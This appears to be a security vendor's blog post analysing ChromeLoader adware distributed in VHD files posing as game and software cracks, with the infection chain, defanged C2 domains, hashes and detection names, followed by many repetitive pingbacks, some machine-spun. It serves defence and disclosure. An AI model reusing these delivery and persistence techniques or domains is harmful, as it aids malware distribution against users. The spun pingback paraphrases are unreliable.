Since the previous year, there has been a steady increase in cases where disk image files, such as ISO and VHD, have been used in malware distribution. These have been covered several times in previous ASEC blog posts. This post will cover a recent discovery of ChromeLoader being distributed using VHD files. These VHD files are being distributed with filenames that make them appear like either hacks or cracks for Nintendo and Steam games. Some of the filenames used in distribution are as follows. There are some paid software included in the filenames of some cracks.
- Filenames Used in Distribution
ELDEN RING Free Download (v1_08_1).vhd
Dark Souls 3 [FitGirl Repack]_part1_rar.vhd
Red Dead Redemption 2 Free Download (v1_0_1436_28).vhd
File_ Need for Speed Carbon Collectors Edition____.vhd
File_ Call of Duty Deluxe Edition_zip ___.vhd
File_ Portal_2_v2023_01_17_zip ___.vhd
File_ Minecraft – Story Mode_Complete Season_zi___.vhd
[NEW] ROBLOX _ Doors Script _ Hack _ Spawn Enti___.vhd
The Legend of Zelda_ Breath of the Wild SWITCH ___.vhd
Pokemon Ultra Moon_ Update 1_2 [Decrypted] 3DS ___ (1).vhd
Animal-Crossing-New-Horizons-Switch-NSPNSZXCI-U___.vhd
Mario Kart 8 Deluxe (NSP)(Booster Course DLC)(W___ (2).vhd
Super Mario Odyssey Switch NSP+ Update Free Dow___.vhd
Microsoft Office 2010 Free Download.vhd
Adobe Photoshop 2023 Free Download.vhd
A Google search of any of the above filenames listed multiple websites distributing illegal programs such as game hacks and cracks at the very top of the results page. Downloading an illegal program from any of these websites would cause multiple malicious advertisement websites to appear. The VHD files are assumed to have been downloaded from one of these advertisement websites. Currently, a normal program (7zip installer) is downloaded.
When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program. The files inside the malicious VHD are shown below. Everything except for the Install.lnk file has the hidden property enabled, so ordinary users will only see the Install.lnk file.
Install.lnk runs the properties.bat file and the properties.bat file, in turn, decompresses the files.zip in the “%AppData%” path with a tar command. The files.zip file holds normal files and a malicious js file related to node-webkit(nw.js). node-webkit is a web application that uses Chromium and Node. It can be run through nw.exe and references data written in the package.json file. node-webkit is used in the following process utilizing these characteristics.
Afterwards, properties.bat runs the data.ini file and the videos.exe file that is created after decompression. First, data.ini is a VBScript command that creates a shortcut to videos.exe in the path “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\”.
The videos.exe file has nw.exe inside of it and refers to the package.json to run the script designated by the main property. The script designated by the main property is the file start.html, which contains a malicious JS that has been obfuscated.
Ultimately, the videos.exe file executes the malicious JS within start.html which connects to the below addresses and attempts to download ChromeLoader. Currently, the addresses cannot be accessed. ChromeLoader is an adware that performs malicious behaviors through a Chrome extension. The malicious extension created and executed by ChromeLoader redirects to an advertisement website and collects user browsing data through hijacking. It is capable of various features such as collecting browser credentials and modifying browser settings.
- irymountain.com[.]ua
- lesexwrecko[.]xyz
- alnormatic[.]xyz
Recently, there has been an increase in malware using disk image files. Disguising malware as game hacks and crack programs is a method employed by many threat actors. Users must be particularly cautious about executing files downloaded from unknown sources, and it is advised that users download programs from their official websites. AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.
[File Detection]
Trojan/BAT.Runner.S2119 (2023.02.13.03)
Trojan/VBS.Runner.S2120 (2023.02.13.03)
Dropper/VHD.Agent (2023.02.16.00)
Trojan/HTML.Obfus (2023.02.16.00)
[IOC]
bdcb5c80a664d82a28469f9fce0fbb12
ae8ae62aa04f06d32c548c2ef493a39f
82024e7af52481e71760c9d119eb903f
3515115d7efa1ac42bd56bc9348cd4f8
irymountain.com[.]ua
lesexwrecko[.]xyz
alnormatic[.]xyz
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
[…] ChromeLoader Disguised as Illegal Game Programs Being Distributed – ASEC BLOG (ahnlab.com) […]
[…] to an advertisement website and collects user browsing data through hijacking,” reads the Asec post. “It is capable of various features such as collecting browser credentials and modifying […]
[…] “Quando um arquivo VHD é baixado por meio desse processo, o usuário pode facilmente confundir o arquivo VHD malicioso com um programa relacionado a jogos”, disseram os pesquisadores da ASEC. “Disfarçar o malware como hacks de jogos e programas de crack é um método empregado por muitos agentes de ameaças”, disseram os pesquisadores em um postagem no blog. […]
[…] “When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post. […]
[…] “When a VHD report is downloaded via this procedure, the consumer can simply mistake the malicious VHD report for a game-related program,” ASEC researchers stated. “Disguising malware as sport hacks and crack techniques is a technique hired by way of many danger actors,” researchers stated in a weblog put up. […]
[…] “When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post. […]
[…] “When a VHD file is downloaded by way of this course of, the person can simply mistake the malicious VHD file for a game-related program,” ASEC researchers mentioned. “Disguising malware as sport hacks and crack packages is a technique employed by many menace actors,” researchers mentioned in a blog post. […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] “When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post. […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] file che li fanno apparire come hack o crack per i giochi Nintendo e Steam“, ha dichiarato AhnLab Security Emergency Response Center (ASEC) in un rapporto, facendo anche un elenco di alcuni nomi di file utilizzati per hackerare, […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] “When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post. […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] distribuiti con nomi che li fanno apparire come hack o crack per giochi Nintendo e Steam”, ha dichiarato il Centro di risposta alle emergenze della sicurezza AhnLab (ASEC) in un rapporto la scorsa […]
[…] distribuiti con nomi che li fanno apparire come hack o crack per giochi Nintendo e Steam”, ha dichiarato il Centro di risposta alle emergenze della sicurezza AhnLab (ASEC) in un rapporto la scorsa […]
[…] safety researchers have found out a gradual upward thrust in the usage of disk symbol information, equivalent to ISO and VHD, to […]
[…] ChromeLoader Disguised as Illegal Game Programs Being Distributed – ASEC BLOG https://asec.ahnlab.com/en/48211/ […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last […]
[…] Security Emergency Response Center (ASEC) of AhnLab Security, a team of cybersecurity experts has recently uncovered a fresh wave of ChromeLoader malware that cybercriminals are employing to circumvent antivirus […]
[…] Security Emergency Response Center (ASEC) of AhnLab Security, a team of cybersecurity experts has recently uncovered a fresh wave of ChromeLoader malware that cybercriminals are employing to circumvent antivirus […]
[…] disc symbol layout. In step with the Safety Emergency Reaction Heart (ASEC) professionals at AhnLab Safety, in order to achieve get admission to to delicate data or to take regulate of customers’ […]
[…] or cracks for Nintendo and Steam games,” AhnLab Security Emergency response Center (ASEC) said in a report last week.ChromeLoader (aka Choziosi Loader or ChromeBack) originally surfaced in […]
[…] Safety Emergency Reaction Middle (ASEC) of AhnLab Safety, a crew of cybersecurity professionals has lately exposed a contemporary wave of ChromeLoader malware that cybercriminals are using to bypass antivirus device […]
[…] Security Emergency Response Center (ASEC) of AhnLab Security, a team of cybersecurity experts has recently uncovered a fresh wave of ChromeLoader malware that cybercriminals are employing to circumvent antivirus […]